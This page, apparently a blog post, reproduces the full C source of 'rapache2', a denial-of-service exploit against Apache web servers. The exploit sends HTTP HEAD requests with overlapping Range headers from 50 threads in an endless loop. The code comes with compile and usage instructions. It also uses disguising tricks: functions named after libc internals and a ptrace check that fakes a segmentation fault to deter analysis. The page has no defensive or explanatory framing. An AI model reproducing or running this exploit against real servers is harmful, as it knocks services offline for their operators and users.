Remote Apache Denial of Service Exploit

发表评论 (0) 查看评论
  1. /**
  2. rapache2
  3. “this is another version of rapache”
  4. by: ev1lut10n
  5. bug found by : Nikolaus Rango (Kingcope)
  6. http://www.jasaplus.com/ev1lut10n
  7. gopher://sdf.org/1/users/ev1lut10
  8. Thanks: x-hack, danzel,p4, Ramon de C Valle and all my friends
  9. compile: gcc -o rapache2 rapache2.c -pthread -Wall
  10. **/
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <sys/ptrace.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <netdb.h>
  18. #include <unistd.h>
  19. #include <pthread.h>
  20. #define START_RANGE “HEAD / HTTP/1.1\nHost:localhost\nRange:bytes=0-“
  21. #define USE_KEEP_ALIVE “\nAccept-Encoding: gzip\nKeep-Alive: 115\nConnection: keep-alive\n”
  23. void _do_global_dtors_aux(void) __attribute__ ((constructor));
  24. void _do_global_dtors_aux(void) {
  25. if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
  26. write(fileno(stdout), “Segmentation fault\n”, 19);
  27. exit(-1);
  28. }
  29. }
  31. char *_libc_csu_fini(char total_range[16253])
  32. {
  33. int k=0;
  34. char range[5]=””;
  35. char r2[16136]=””;
  36. while(k<1300)
  37. {
  38. char r[5]=”,5-“;
  39. char ads[11]=””;
  40. sprintf(range,”%d”,k);
  41. strcat(ads,r);
  42. strcat(ads,range);
  43. strcat(r2,ads);
  44. k++;
  45. }
  46. strcat(total_range,START_RANGE);
  47. strcat(total_range,r2);
  48. strcat(total_range,USE_KEEP_ALIVE);
  49. return total_range;
  50. }
  52. void banner()
  53. {
  54. fwrite(“Remote Apache Denial of Service Exploit by ev1lut10n\n”, 53, 1, stdout);
  55. }
  56. void gime_er_mas()
  57. {
  58. printf(“%c%s”, 0x1b, “[2J”);
  59. printf(“%c%s”, 0x1b, “[1;1H”);
  60. printf(“\n[-] Usage : ./rapache2 hostname port_number\n”);
  61. printf(“\n[-] Usage : ./rapache2 localhost 80\n”);
  63. }
  64. struct thread_info {
  65. pthread_t thread_id;
  66. int thread_num;
  67. char *variabel1;
  68. char *variabel2;
  69. char *variabel3;
  70. };
  73. void *_libc_csu_init(void *arg)
  74. {
  75. struct thread_info *tinfo = (struct thread_info *) arg;
  76. char hostname[64];
  77. char p1[4];
  78. int j;
  79. char rr[16253];
  80. sprintf(rr,”%s”,_libc_csu_fini(rr));
  82. strcpy(hostname, tinfo->variabel1);
  83. strcpy(p1, tinfo->variabel2);
  84. j = 0;
  85. while (j != 10) {
  86. struct addrinfo hints;
  87. struct addrinfo *result, *rp;
  88. int sfd, s;
  89. ssize_t nwritten;
  90. memset(&hints, 0, sizeof(struct addrinfo));
  91. hints.ai_family = AF_INET;
  92. hints.ai_socktype = SOCK_STREAM;
  93. hints.ai_flags = 0;
  94. hints.ai_protocol = 0;
  95. s = getaddrinfo(hostname, p1, &hints, &result);
  96. if (s != 0) {
  97. continue;
  98. }
  99. for (rp = result; rp != NULL; rp = rp->ai_next) {
  100. sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  101. if (sfd == -1)
  102. continue;
  103. if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
  104. close(sfd);
  105. }
  106. if (result != NULL)
  107. freeaddrinfo(result);
  108. nwritten = write(sfd,rr, 16255);
  109. printf(“\n%s\n”,rr);
  110. if (nwritten == -1)
  111. close(sfd);
  112. usleep(300000);
  113. j++;
  114. }
  116. return 0;
  117. }
  119. int main(int argc, char *argv[])
  120. {
  122. int i;
  123. struct thread_info tinfo;
  124. banner();
  125. if (argc <= 1) {
  126. gime_er_mas();
  127. return 0;
  128. }
  129. printf(“[+] Attacking %s please wait in minutes …\n”, argv[1]);
  130. while (1) {
  131. i = 0;
  132. while (i != 50) {
  133. tinfo.thread_num = i;
  134. tinfo.variabel1 = argv[1];
  135. tinfo.variabel2 = argv[2];
  136. pthread_create(&tinfo.thread_id, NULL, &_libc_csu_init, &tinfo);
  137. usleep(500000);
  138. i++;
  139. }
  140. }
  142. }
发表评论?

0 条评论。

发表评论